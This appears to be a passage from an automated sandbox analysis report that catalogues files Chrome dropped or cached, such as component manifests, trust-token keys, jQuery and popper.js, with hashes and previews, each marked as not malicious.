SHA-256:	225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
SHA-512:	B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\manifest.fingerprint

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.820000180714897
Encrypted:	false
SSDEEP:
MD5:	BBEC7670A2519FEB0627F17D0C0B5276
SHA1:	9C30B996F1B069F86EF7C0136DFAF7E614674DEA
SHA-256:	670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
SHA-512:	1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
Malicious:	false
Reputation:	unknown
Preview:	1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\manifest.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.462192586591686
Encrypted:	false
SSDEEP:
MD5:	084E339C0C9FE898102815EAC9A7CDEA
SHA1:	6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
SHA-256:	52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
SHA-512:	0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
Malicious:	false
Reputation:	unknown
Preview:	{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\sets.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	4.629347296880043
Encrypted:	false
SSDEEP:
MD5:	8C702C686B703020BC0290BAFC90D7A0
SHA1:	EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
SHA-256:	97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
SHA-512:	6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
Malicious:	false
Reputation:	unknown
Preview:	{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\_metadata\verified_contents.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1765
Entropy (8bit):	6.016932513650603
Encrypted:	false
SSDEEP:
MD5:	6D1D175F88B64546105E3E7C31D1129A
SHA1:	75A1B56F55BB62B05365A0FDBFC7941DE77CBFAF
SHA-256:	A0BC246E8E160A9BB32FA60F4E7A04D148A17125F426509466031E07731FDF81
SHA-512:	5C80908331E30C7EAD67F7F6C5AB064B07626FD9C58925A0D2124D66B25C5AE2F218BDACFB68AFCB332E88EB297CFB7E0A7A9E5E1E54C9B7A510FEF095F9B54F
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiSUxrUllPSmhIVEZacllLRmN5UC12SkJrVjNWbWVLdHo4d1hEb2VPWjBZMCJ9LHsicGF0aCI6InNzbF9lcnJvcl9hc3Npc3RhbnQucGIiLCJyb290X2hhc2giOiJyRFZLUnlPcXBQQnI3RGhkM2VTazBKZzYxUlJXOVNzeHFBYU95WDFiWHFjIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiZ2lla2NtbWxua2xlbmxhb21wcGtwaGtuam1ubnBuZWgiLCJpdGVtX3ZlcnNpb24iOiI3IiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"nBdNk-7bgnEftAs4hWaHwF1Lk9pt7Eh6pcqe2gyNsE7VnVRp-H27tm1RFAF4htCUlXNJxX6YY-MUiK2DqJpQ3c73KDaFV8DcnadQfcXO3Lbrw7jLYSUaSdzujPkTyhuFcq_BhK0KWiIJ0aJgh7nVOBfAa5AbE6oFlLKMB2Ls0gmzS1-a5hUIu4rw2h9r9jkr6gLYbein5Jk2hdwW3u-1GNjyki4dftG2iZNAI8VhUf5gnCiF4AHCnYSGJsM0RGkmO_HJIzgwpQpP3RDsG2ioeKgxL-kcHhjXWOj3uVGyxpp1FkyHGkeGuqpFZMAxx3CEBiOtFj7i3iQxkgEW-E3uMKI3yA

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\manifest.fingerprint

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.9555383032528804
Encrypted:	false
SSDEEP:
MD5:	684DA5CCA8ADC8CA59CBE5B082CFE0B5
SHA1:	B8784E02DB81C5F846A7848455A2C6629A88BD64
SHA-256:	F48C9D93CC216AF13BBFAD15DD5E6D1679CD35D318E664029DDF61EFC6E51A5D
SHA-512:	EAEB9B8C51AEF3CC2749F4E6B2C2B58334E53C0BA701DB94F2896C9557B949D392CF4F44B771821C63DD238FAC2B2F869833BED2DFF830AFC4C8743683A75183
Malicious:	false
Reputation:	unknown
Preview:	1.3eb16d6c28b502ac4cfee8f4a148df05f4d93229fa36a71db8b08d06329ff18a

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\manifest.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	76
Entropy (8bit):	4.169145448714876
Encrypted:	false
SSDEEP:
MD5:	4AAA0ED8099ECC1DA778A9BC39393808
SHA1:	0E4A733A5AF337F101CFA6BEA5EBC153380F7B05
SHA-256:	20B91160E2611D3159AD82857323FEBC906457756678AB73F305C3A1E399D18D
SHA-512:	DFA942C35E1E5F62DD8840C97693CDBFD6D71A1FD2F42E26CB75B98BB6A1818395ECDF552D46F07DFF1E9C74F1493A39E05B14E3409963EFF1ADA88897152879
Malicious:	false
Reputation:	unknown
Preview:	{. "manifest_version": 2,. "name": "sslErrorAssistant",. "version": "7".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\ssl_error_assistant.pb

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	2816
Entropy (8bit):	6.108955364911366
Encrypted:	false
SSDEEP:
MD5:	E2F792C9E2DD86F39E8286B2EAD2FC70
SHA1:	8A32867614D2A23E473ED642056DED8E566687F9
SHA-256:	AC354A4723AAA4F06BEC385DDDE4A4D0983AD51456F52B31A8068EC97D5B5EA7
SHA-512:	6A7AF0CA1EFA65A89A9CA3B8DF0D2E24F21D91673C60CDFEEB02D33647442B01D535497249542F40E66E0D2DD3E9F8ED1F4A201FD97138D07A2B71366737E580
Malicious:	false
Reputation:	unknown
Preview:	...5.3sha256/fjZPHewEHTrMDX3I1ecEIeoy3WFxHyGplOLv28kIbtI=.5.3sha256/m/nBiLhStttu1YmOz7Y3D2u1iB1dV2CbIfFa3R2YW5M=.5.3sha256/8Iuf4xRbVCmCMQTJn3rxlglIO1IOKoyuSUgmXyfaIKs=.5.3sha256/8IHdrS+r6IWzSMcRcD/GA6mBxk1ECX8tGRW0rtGWILE=.5.3sha256/k/2eeJTznE32mblA/du19wpVDSIReFX44M8wXa2JY30=.5.3sha256/urWd7jMwR6DJgvWhp6xfRHF5b/cba3iG0ggXtTR6AfM=.5.3sha256/IJPCDSE5tM9H3nuD5m6RU2i9KDdPXVn4qmC/ULlcZzc=.5.3sha256/0Gy8RMdbxHNWR2GQJ62QKDXORYf5JmMmnr1FJFPYpzM=.5.3sha256/8tTICtyaxIQrdbYYDdgZhTN0OpM9kYndvoImtw1Ys5E=.5.3sha256/F7HIlsaG0bpJW8CzYekRbtFqLVTTGqwvuwPDqnlLct0=.5.3sha256/zaV2Aw1A742R1+WpXWvL5atsJbGmeSS6dzZOfe6f1Yw=.5.3sha256/UwOkRGMlP0K/mKNJdpQ0sTg2ean9Tje8UTOvFYzt1GE=.5.3sha256/w7KUXE4/BAo1YVZdO3mBsrMpu4IQuN0mhUXUI//agVU=.5.3sha256/JnPvGqEn36FjHQlBXtG1uWwNtdMj1o2ojR/asqyypNk=.5.3sha256/AUSXlKDCf1X30WhWeAWbjToABfBkJrKWPL6KwEi5VH0=.5.3sha256/zSyVjjFJMIeXK0ktVTIjewwr6U5OePRqyY/nEXTI4P8=.5.3sha256/9dcHlrXN2WV/ehbEdMxMZ8IV4qvGejCtNC5r6nfTviM=.5.3sha256/E+0WZLGSIe5nddlVKZ5fYzaNHHCE3hNqi/OWZD3iKgA=.5.3sha2

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\_metadata\verified_contents.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1865
Entropy (8bit):	6.002187808693378
Encrypted:	false
SSDEEP:
MD5:	F85CE0D2E1806C582954BD831378033E
SHA1:	584222C390C8E9D0B85574083B89BE48114B7F00
SHA-256:	E4FA2DED0327C43AA618CC751B8A8704CBEC33CDBC28E5FF49D536D58226E5BB
SHA-512:	08A9F6C42A774287A883A745ACF1A17327DF19493248C69D8497B6A5EE1A5E9310FB756A3C4C7665624929D4387BF365CAE5F6100AA873C04BFF2B56932BE4A8
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6ImtleXMuanNvbiIsInJvb3RfaGFzaCI6IlR2TGVraUQyX3VCdDl5aDlYZFZST3hfVi01ZklaYUViZnZBczhxNHBqbXMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiSTc3VnlPdnFERGRrZ3pkTHJYdXZZenAtVXZQZ3BnazNIRkdPQnVaRnZhQSJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImtpYWJoYWJqZGJramRwamJwaWdmb2RiZGptYmdsY29vIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMC4xMS4xIiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"rI34430Mqa-tj3CBWGaM65yBUrAgUFc_poiZa1PmmwZy_8S1PPjJcTKAXt-I10CHBN9n7hJfg4LFTlfcRv_dib5mbGIB-N9Mq7RkoFminZgi0tz4AdN192wkghWiKh0b8ZBciaG-vh8yu25g95jrBRml6PbDtD-1PgRqGw4NexUGWjguIW2gnGtRZ4FE-BEPNYI8cifzHEZAoyUs0jJHMJN8vavFR76ngAOpjvTNke8su9XpGHRDud

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\keys.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7057
Entropy (8bit):	5.979533556811076
Encrypted:	false
SSDEEP:
MD5:	052B398CC49648660AAFF778D897C6DE
SHA1:	D4FDD81F2EE4C8A4572AFFBFD1830A0C574A8715
SHA-256:	47EC07DDF9BBD0082B3A2DFEA39491090E73A09106945982E395A9F3CB6D88AE
SHA-512:	ED53D0804A2EF1BC779AF76AA39F5EB8CE2EDC7F301F365EEAA0CF5A9AB49F2A21A24F52DD0EB07C480078CE2DD03C7FBB088082AEA9B7CDD88A6482AE072037
Malicious:	false
Reputation:	unknown
Preview:	{"https://issuer.captchafox.com":{"PrivateStateTokenV1VOPRF":{"batchsize":1,"id":1,"keys":{"0":{"Y":"AAAAAQQiyE+SESbq7GU5rTx6tZO4tBOxljp+Oya2mU28O+YoALIyXlLLqnl/h5h95ExYSsOlmMIb8EdsJBTrCaDl/KIZSskrfMbZpjhShG0jwnbXojEHI9WaAxKLkX/A/DkyMEg=","expiry":"1734807628115000"},"1":{"Y":"AAAAAQRNtld+5LLBquS4bEJKJwlLw61tzIyqTNkvMVnUTu+YiphbdGrRCjeDTN9D3p1Tgpfmq0N/OKMBYWzDMEN8Km9p9s49c6N2ph4B1MV1m7Ogdj969MOsTw54Kc849oqDl8s=","expiry":"1734807628115000"},"2":{"Y":"AAAAAQSBWW003A3ORFURCZrWNnbEIH15yzk184DaLSebbGzRdyCYtAM1qhhVmXZyBtWTzh6Bfkk5rLPyE1xdQilofPBizF/QJsdaMU0GYhPW1sOU4xoKbmgd/XrnOoFqA2ETOuc=","expiry":"1734807628115000"},"3":{"Y":"AAAAAQSG/ftGdm5B6iwAmVsHt6s43xx3nRf/Vpx9GdeEt3jSTM8hHvyLE9FAEkinGjt4Fp5EjnkCdE96Cxz10nZJRrMApIrGhG5kAoDu4T8PjJPiFQFyHAOdTG7OJWi2NS/rl1A=","expiry":"1734807628115000"},"4":{"Y":"AAAAAQT36tqe550UP5A+4Eokt8iuPZEuWQc9cGJXd7zUCZzrsqtGu3PMcVbOj5DjC4W+yoyF3HqKOqdtiBWgcMsZOcyln/6jUKqf5tS9AoIHa9CC3kQB8ISQd3lhR5j+qWVY8ms=","expiry":"1734807628115000"},"5":{"Y":"AAAAAQQMjaLNCR

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\manifest.fingerprint

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.8890592795725096
Encrypted:	false
SSDEEP:
MD5:	F06BBDC2FFF07678F17AB2E13E5242F2
SHA1:	38267922774478D53BBDF6C58F1AB621F76AD147
SHA-256:	04F1C19701E9F79342896D68856EB04023679DB2638B1038472B8F1AD790BCC6
SHA-512:	6223822E0AFD58EB7C25C5B207E377964C5E07779779E8DE5B2703B46526C4868DF217AF95F80E7692305ED98F8350ED20673659106116D95F1332C6A3EF540F
Malicious:	false
Reputation:	unknown
Preview:	1.fbd0d7206f8650d442eb772a03839aabc778b0225aee04589ca8cdad2aa99cca

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\manifest.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.418776852063957
Encrypted:	false
SSDEEP:
MD5:	077DA41A01DDE0173EBBF70D3B7210E2
SHA1:	4B3C3DEEB9522CA4EF4E42EFCF63B2674F6A5C07
SHA-256:	23BED5C8EBEA0C376483374BAD7BAF633A7E52F3E0A609371C518E06E645BDA0
SHA-512:	2822D02E2B3C6306E6D71FA62E7F472B4C3CDF0CBE499B70AC60A0A50E547ED47C394D7DE88BBEF2E6015920442B9D30CBC0D6869D154E02EC251712F918DEEC
Malicious:	false
Reputation:	unknown
Preview:	{. "manifest_version": 2,. "name": "trustToken",. "version": "2024.10.11.1".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\_metadata\verified_contents.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1311
Entropy (8bit):	5.980927481700407
Encrypted:	false
SSDEEP:
MD5:	F584E95EC547F8E9892079DCCB8C0300
SHA1:	9B0819F3F03267093B7C975F840BDA5FB1A343A9
SHA-256:	229276E289709A403DAEC9B03DFB1477D3AB6801094B79A8983474223C4CF963
SHA-512:	265E5406C965032E3477CB250AE8878843CCB62412B23D7454AC520B6DBDD367F45F0810DA708A4D29E3B0D219FA1B40B8DA0638F1E0E6B831836FAD21085488
Malicious:	false
Reputation:	unknown
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoidmhzdFMxaUFXRWxoeEc3STdTZHJidVEtcFpYYVZuSUNhT0JiMDlYSlUwQSJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Imxsa2dqZmZjZHBmZm1oaWFrbWZjZGNibG9oY2NwZm1vIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjAuMTciLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"FmyKp6BeTnEz4O2ZeErhtHi561C6YqZWvYffP8tIXaVpUdqn2H7wE99Czl03-8QinTEJ_PTuudrhNTrUM4e-SOewVi5E4wDijHU1eMgE9A_A2nGBu6vfvKrNIYTp4Ut175fTe4AhWMpbYyrsECEuQNf5AxYpnXg8F3WOqJj5TPWtuPMn2xmiJUkEnRs9okD6guLeMx4yhkdXOme2LnLFAfe6Ulfxew_XHXvZ1Y7MohLS_R1QPl1EIlf2HuJTZllyvNPehR4nJGG8FC--7fI9xw6EAsozvwpTUTKEktRcI1FXWRWlIAmtuK-g3HH_d30putZeNp1bDNUctkDolQKBVQ"},{"header":{"kid":"webstore"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"D-sVn2blf9c5r4WX327IV9uEthjKF5c7FIagu

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\manifest.fingerprint

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.850937210714388
Encrypted:	false
SSDEEP:
MD5:	DD4911D1000B0779A63B51B9DC72BA6F
SHA1:	0853C546284867A3BCDB59E506DD2F0B596145A1
SHA-256:	57D878544717AB76EEFB05BFA9409AFA38ED565813B81A7EED8FDDD929015E40
SHA-512:	1D763C57CAA7DCD84547E90466CD8B5A85158052D344A3A9FFBC55BEE7F3AFC535EE658F09055D4C68B7BEBDC2B3C590F62B41274F25E3DA8A0F9009A0DD35AB
Malicious:	false
Reputation:	unknown
Preview:	1.2638e3c2d1fa1d417bfdc31dd21bc938f106d3b436a6488b41b014ca9e2b7541

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\manifest.json

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	300
Entropy (8bit):	4.725809151196814
Encrypted:	false
SSDEEP:
MD5:	01F3DE10093B3B262105724E85817FA6
SHA1:	97DEE66ECE41B53A27CBD4579F44C204E35D19D6
SHA-256:	BE1B2D4B5880584961C46EC8ED276B6EE43EA595DA56720268E05BD3D5C95340
SHA-512:	9646B13E23C4214BCC45715FBC60EB9AFB29F934D5D33B3471EE89A6F399A68D83B5BDFF14748F73CE6A7C2C9FDCE782A4CE849F855A900514636B529E9B400F
Malicious:	false
Reputation:	unknown
Preview:	{. "description" : "Origin Trials public key updates and disabled features list",. "manifest_version" : 3,. "minimum_chrome_version" : "88",. "name" : "Origin Trials Updates",. "origin-trials" : null,. "update_url" : "https://clients2.google.com/service/update2/crx",. "version" : "1.0.0.17".}

Chrome Cache Entry: 160

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (19015)
Category:	downloaded
Size (bytes):	19188
Entropy (8bit):	5.212814407014048
Encrypted:	false
SSDEEP:
MD5:	70D3FDA195602FE8B75E0097EED74DDE
SHA1:	C3B977AA4B8DFB69D651E07015031D385DED964B
SHA-256:	A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
SHA-512:	51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Preview:	/. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. /(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto\|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

Chrome Cache Entry: 161

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 180 x 180, 4-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	1031
Entropy (8bit):	7.690629361203651
Encrypted:	false
SSDEEP:
MD5:	7325E2012A6CF941A6EA14F0061FF764
SHA1:	0D2BA63E280B979A98BC431BEC8A7AF985578769
SHA-256:	63E3696C5E5E8B037E28E8FBEF871184B0D1D60A7314C965B1426D9CCE84DD69
SHA-512:	602AB2E43F39D22EDC6368F8C82CAC6F7FFD2120F5EECAF7B129381044452C3C29AB88BEFADA1CA789604FFAA180AC5F6776F4132B4AA648BAF962ADD500D7B6
Malicious:	false
Reputation:	unknown
URL:	https://i.ibb.co/3YR862r/favicon-32x32.png
Preview:	.PNG........IHDR.....................gAMA......a.....sRGB........0PLTE&........&..&.......Q.............Q.....w..w..JK.V...uIDATh..?k.@...N...@....Z.....]..@p?..C.C.m.L]<.-.2_.Nn?@.2f.7.>@(........`+...-.G....tzzw....0..0..0..0..o#....B...k9......Rox.....K.^....".@.d....8....ZTW.j8Kh..n.(.~...p..g......5..7..........f.v5.......S...ga...}....Y.....:.X&.\,m.v.0.Y.....g....`y.H.Z%..e....P.D.!...6.....^....c...Z{VC.2..Jb...."].6.~.. '..A...z..\|.....ZSN...k.k.z{5...5R.P...!.\|...$...o..I..JM-.......7...&.w.5....Uk.J....L.Z....r....Q..H3...=V}H......&.....I=....=m....}.e....z......K..^...0..0...a.o.i5...l...:.>...{.Z.]>.C/a.,U..[(u!..H8..!.K.Hs5.cW+...\.v..}!.....$.A...p.)..UmG.4}2.<RK.g..`....q.?.{.B,..5.}k5n..;>mS.'u,.....U'&...<..s~....H4<).z$a...V.P.#g.c@....._p...$........^Z..Y.~v.z..H.0q.....$.P....NQM.].Xuc....6.zc.......pLC.T<..u...X...VGCg.) .QM...&~...M..4..j..M.A..3Cj..~@j.]..Wj.....&s..,..Vc^......Bd.6..E...\|K...!.?...#.o.G.a..a..

Chrome Cache Entry: 164

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	271751
Entropy (8bit):	5.0685414131801165
Encrypted:	false
SSDEEP:
MD5:	6A07DA9FAE934BAF3F749E876BBFDD96
SHA1:	46A436EBA01C79ACDB225757ED80BF54BAD6416B
SHA-256:	D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
SHA-512:	E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.3.1.js
Preview:	/!. jQuery JavaScript Library v3.3.1. * https://jquery.com/. . Includes Sizzle.js. * https://sizzlejs.com/. . Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. . Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor

Chrome Cache Entry: 166

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
